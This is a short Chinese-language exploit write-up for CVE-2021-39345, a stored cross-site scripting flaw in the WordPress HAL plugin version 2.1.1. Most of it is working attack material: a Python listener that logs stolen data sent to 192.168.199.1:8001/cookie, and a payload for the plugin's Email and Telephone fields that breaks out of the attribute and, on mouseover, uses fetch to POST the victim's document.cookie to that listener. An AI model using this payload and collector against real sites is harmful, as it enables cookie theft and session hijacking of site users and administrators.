CVE-2021-39345

CVE-2021-39345-Wordpress-Hal插件漏洞,版本Wordpress插件Hal.2.1.1

• XSS反弹

from http.server import BaseHTTPRequestHandler


class PostHandler(BaseHTTPRequestHandler):
    def end_headers(self):
        self.send_header('Access-Control-Allow-Origin', '*')
        BaseHTTPRequestHandler.end_headers(self)


    def do_POST(self):       
        if self.path == "/cookie":
            req_datas = self.rfile.read(int(self.headers['content-length']))
            print(req_datas.decode())


        self.send_response(200)
        self.send_header('Content-type', 'application/json')
        self.end_headers()


if __name__ == '__main__':
    from http.server import HTTPServer
    server = HTTPServer(('192.168.199.1', 8001), PostHandler)
    print('Starting server, use <Ctrl-C> to stop')
    server.serve_forever()

• 在Hal的Email，Telephone等输入框中插入Payload

"OnMoUsEoVeR=fetch("http://192.168.199.1:8001/cookie",{method:'POST',body:document.cookie,mode:'cors'})//

• 把鼠标重新放到Email，Telephone等输入框中即触发Payload